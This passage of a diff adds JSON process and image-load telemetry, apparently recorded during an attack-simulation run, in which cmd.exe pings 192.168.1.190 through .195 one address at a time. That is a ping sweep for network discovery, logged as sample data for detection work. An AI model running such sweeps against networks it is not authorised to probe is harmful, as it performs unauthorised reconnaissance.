"subtype": "create", + "timestamp": 131883572912130000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "process", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572916990000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.190", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 260, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572917130000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917300000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917300000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917300000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "process", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572921830000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.191", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6508, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "process", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572926840000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.192", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4204, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "process", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572931830000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.193", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5084, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "process", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572936830000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.194", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3940, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "process", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572941840000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.195", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3592, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": 